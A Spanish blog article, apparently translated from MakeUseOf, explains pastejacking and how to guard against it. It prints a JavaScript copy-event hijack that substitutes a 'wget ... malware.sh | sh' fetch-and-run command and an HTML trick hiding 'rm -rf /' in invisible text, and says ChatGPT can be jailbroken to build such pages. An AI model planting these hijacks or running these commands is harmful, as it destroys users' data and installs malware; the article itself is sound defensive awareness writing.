Por qué no deberías copiar y pegar comandos de Internet

Desde computadoras hasta teléfonos móviles, copiar y pegar prevalece en todas partes. Hace la vida más fácil y te ahorra tiempo ya que no tienes que escribir comandos largos ni textos redundantes. Sin embargo, si no eres lo suficientemente cuidadoso, puedes ser hackeado simplemente copiando y pegando comandos en la terminal de tu computadora.

Aquí aprenderemos cómo copiar y pegar puede hacer que te hackeen y qué debes hacer para evitarlo.

copiar y pegar comandos de Internet

Por qué no deberías copiar y pegar comandos

Ya sea que seas nuevo en el uso de la línea de comandos o sea un veterano, puedes sentirte tentado a copiar y pegar comandos de Internet para ahorrar tiempo y realizar el trabajo real. Sin embargo, debes tener en cuenta que los sitios maliciosos en realidad están utilizando cuadros de código como armas para inyectar código malicioso cada vez que copias y pegas comandos directamente en la terminal.

Estos atacantes están utilizando varios trucos de interfaz para ocultar comandos maliciosos detrás de un código que parece inofensivo.

Un comando como sudo apt-get update && apt-get update normalmente debería actualizar los repositorios y los paquetes en un sistema Linux. Sin embargo, si no lo sabes y copias y pegas este comando directamente en tu terminal, es posible que sin saberlo estés ejecutando código de malware con privilegios de root debido al prefijo sudo.

En el peor de los casos, esto podría resultar en una toma total de control de tu sistema o incluso en un ataque de ransomware. Pero ¿Cómo hacen esto los atacantes? ¿Cómo se pueden ocultar comandos maliciosos detrás de código inofensivo?

Cómo funcionan los exploits de código malicioso

Este exploit se puede llevar a cabo utilizando JavaScript ingeniosamente diseñado o incluso HTML básico. JavaScript tiene un mecanismo llamado EventListener. Los eventos son acciones que pueden ocurrir en el navegador, como hacer clic en un botón, enviar un formulario, mover el mouse, presionar teclas o cambiar el tamaño de la ventana.

EventListener, como su nombre indica, permite que una aplicación web reaccione a ciertos eventos desencadenados por la acción del usuario. Las páginas web maliciosas aprovechan este mecanismo legítimo y útil capturando el evento en el que un usuario copia texto y reemplazando el texto inofensivo con código malicioso.

Aquí está el código de explotación principal utilizado para este truco:

<script>
document.addEventListener('copy', function(event) {
  event.preventDefault();
  const copiedText = "wget http://localhost:8000/malware.sh | sh";
  event.clipboardData.setData('text/plain', copiedText);
});
</script>

Aquí hay otra demostración que no requiere JavaScript y usa HTML básico:

<p>
sudo apt-get install google-chrome-stable
<span style="color:white;font-size:0pt;">rm -rf /</span>

</p>

Esto crea un texto blanco invisible, que oculta efectivamente el comando malicioso "rm -rf /" y la etiqueta <br> crea un salto de línea para que algunas terminales ejecuten inmediatamente el código al pegarlo. Se podría pensar que se requieren conocimientos sólidos de programación y desarrollo web para llevar a cabo este ataque, pero, en realidad, es bastante fácil.

Incluso si un atacante no tiene ningún conocimiento de JavaScript o desarrollo web, puede crear malware fácilmente utilizando ChatGPT. Con las indicaciones adecuadas, uno puede hacer jailbreak a ChatGPT fácilmente y hacer que cree páginas web maliciosas que utilicen este truco.

Cómo puedes protegerte

No existe una forma concreta de protegerse contra ataques de códigos maliciosos. Claro, puedes no permitir JavaScript para sitios sospechosos, pero, por su naturaleza, probablemente no te permitirán navegar sin JavaScript activado.

Además, para el método CSS (Hojas de Estilo en Cascada), no existe una defensa concreta contra comandos maliciosos ya que sigue siendo un código CSS válido (es decir, no tiene nada de malo, pero la intención sigue siendo maliciosa). La mejor manera de protegerse sería simplemente seguir una higiene básica en Internet y ser ingenioso.

No visites enlaces desconocidos y asegúrate de pegar siempre el comando que estás copiando de Internet en un editor de texto antes de pegarlo en la terminal. Cíñete a recursos de código legítimos y de buena reputación para asegurarte de no recibir código malicioso en tu línea de comando.

Además, algunas terminales, como la terminal xfce4, vienen preequipados con protección para copiar y pegar. Mostrará una ventana emergente que te dirá exactamente qué se ejecutará tan pronto como pegues un comando en tu terminal. Comprueba si tu terminal también tiene un mecanismo similar y actívalo.

La ejecución de código malicioso es muy peligrosa

Incluso si tienes instalado un antivirus, ciertas formas de ejecución de código malicioso aún pueden traspasar las barreras protectoras de tu dispositivo. Por eso es fundamental tener cuidado con el código que copias en línea y emplear medidas de protección siempre que sea posible para mantenerse a salvo.

Fuente: MakeUseOf

7 juegos para Linux que puedes jugar en la terminal

Tu opinión es importante para mí, porque me ayuda a mejorar. Si te gustó el articulo o tienes alguna sugerencia, déjame tu comentario con tu nombre para poder responderte tan pronto como pueda.

Publicar un comentario (0)
Artículo Anterior Siguiente Artículo